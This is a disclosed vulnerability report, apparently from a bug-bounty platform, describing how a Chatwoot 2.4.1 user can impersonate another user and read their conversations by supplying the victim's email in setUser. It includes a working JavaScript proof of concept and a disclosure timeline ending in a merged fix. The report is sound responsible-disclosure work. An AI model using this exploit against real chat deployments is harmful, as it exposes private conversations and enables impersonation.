Remote access to another's conversation based on their email address in chatwoot/chatwoot

Valid

Reported on

Apr 22nd 2022


System:

  • Chatwoot 2.4.1, self-hosted
  • User identity validation is enabled
  • Each client has a unique identifier and a corresponding valid hmac

Description

User B can impersonate User A and access his chat history by filling in user A's email address in the setUser despite that the two users do not share the same unique ID nor the same HMAC.

I can reproduce and I've made a screencast.

Proof of Concept

IN USER A BROWSER:

<html> <head> <script> // CHATWOOT INITIALISATION var t = "script"; var d = document; var g = d.createElement(t), s = d.getElementsByTagName(t)[0]; g.src = "https://chatbot.helmo.be/packs/js/sdk.js"; g.defer = true; g.async = true; s.parentNode.insertBefore(g, s); g.onload = function () { window.chatwootSDK.run({ websiteToken: "xnsdyXjCDy5nWb9L1xTKXERX", baseUrl: "https://chatbot.helmo.be" }); };

        // USER INITIALISATION
        window.addEventListener('chatwoot:ready', function () {
            // CHATWOOT USER'S CONFIGURATION
            var userConfig = {
                // USER-B UNIQUE IDENTIFIER -- COMES FROM OUR SERVER BUT HERE IS AN EXAMPLE
                tokenPublicUtilisateur: "B3E5BD88D0FE9E92CD04DA7EF5A449FDD1C807DE495E659F56FA400AD02613C1",

                // USER-B VALID HMAC BASED ON USER UNIQUE IDENTIFIER AND CHATWOOT PRIVATE KEY -- COMES FROM OUR SERVER BUT HERE IS AN EXAMPLE
                hmacUtilisateur: "0a7331f5482b26cf6e74aa4294e6890b5eb9593ec71f9edad8cf9f24f9704fa5",

                // USER-A AND USER-B EMAIL
                // USER-B CLAMIS TO HAVE USER-A E-MAIL ADDRESS
                email: "test-user-a@gmail.com",
            };

            console.log("user identifier: " + userConfig.tokenPublicUtilisateur);
            console.log("user hmac: " + userConfig.hmacUtilisateur);
            console.log("user email: " + userConfig.email);

            // USER-A INITIALISATION
            window.$chatwoot.setUser(userConfig.tokenPublicUtilisateur, {
                identifier_hash: userConfig.hmacUtilisateur,
                name: null,
                email: userConfig.email,
                phone_number: null
            });
        });
    </script>
</head>

</html>

IN USER B BROWSER:

<html> <head> <script> // CHATWOOT INITIALISATION var t = "script"; var d = document; var g = d.createElement(t), s = d.getElementsByTagName(t)[0]; g.src = "https://chatbot.helmo.be/packs/js/sdk.js"; g.defer = true; g.async = true; s.parentNode.insertBefore(g, s); g.onload = function () { window.chatwootSDK.run({ websiteToken: "xnsdyXjCDy5nWb9L1xTKXERX", baseUrl: "https://chatbot.helmo.be" }); };

        // USER INITIALISATION
        window.addEventListener('chatwoot:ready', function () {
            // CHATWOOT USER'S CONFIGURATION
            var userConfig = {
                // USER-B UNIQUE IDENTIFIER -- COMES FROM OUR SERVER BUT HERE IS AN EXAMPLE
                tokenPublicUtilisateur: "72907A68EC50F17ABD2D1E09EDDCA7102C9679C9E40B612E306DC8C2AA6BD054",

                // USER-B VALID HMAC BASED ON USER UNIQUE IDENTIFIER AND CHATWOOT PRIVATE KEY -- COMES FROM OUR SERVER BUT HERE IS AN EXAMPLE
                hmacUtilisateur: "da1e4d7464a01209b7e6c00977e095868b014f7248d678c0dfcf38e5e749eb2f",

                // USER-A AND USER-B EMAIL
                // USER-B CLAMIS TO HAVE USER-A E-MAIL ADDRESS
                email: "test-user-a@gmail.com",
            };

            console.log("user identifier: " + userConfig.tokenPublicUtilisateur);
            console.log("user hmac: " + userConfig.hmacUtilisateur);
            console.log("user email: " + userConfig.email);

            // USER-B INITIALISATION
            window.$chatwoot.setUser(userConfig.tokenPublicUtilisateur, {
                identifier_hash: userConfig.hmacUtilisateur,
                name: null,
                email: userConfig.email,
                phone_number: null
            });
        });
    </script>
</head>

</html>

Impact

Access confidential conversation and impersonating someone

We are processing your report and will contact the chatwoot team within 24 hours. 5 months ago
We have contacted a member of the chatwoot team and are waiting to hear back 5 months ago
We have sent a follow up to the chatwoot team. We will try again in 7 days. 5 months ago
We have sent a second follow up to the chatwoot team. We will try again in 10 days. 5 months ago
We have sent a third and final follow up to the chatwoot team. This report is now considered stale. 5 months ago
Sojan Jose validated this vulnerability 4 months ago

thanks a lot for the report. We were able to replicate this on our end.

Nicolas M. has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the chatwoot team. We will try again in 7 days. 4 months ago
We have sent a second fix follow up to the chatwoot team. We will try again in 10 days. 3 months ago
We have sent a third and final fix follow up to the chatwoot team. This report is now considered stale. 3 months ago
Sojan Jose confirmed that a fix has been merged on f71980 a month ago
The fix bounty has been dropped
to join this conversation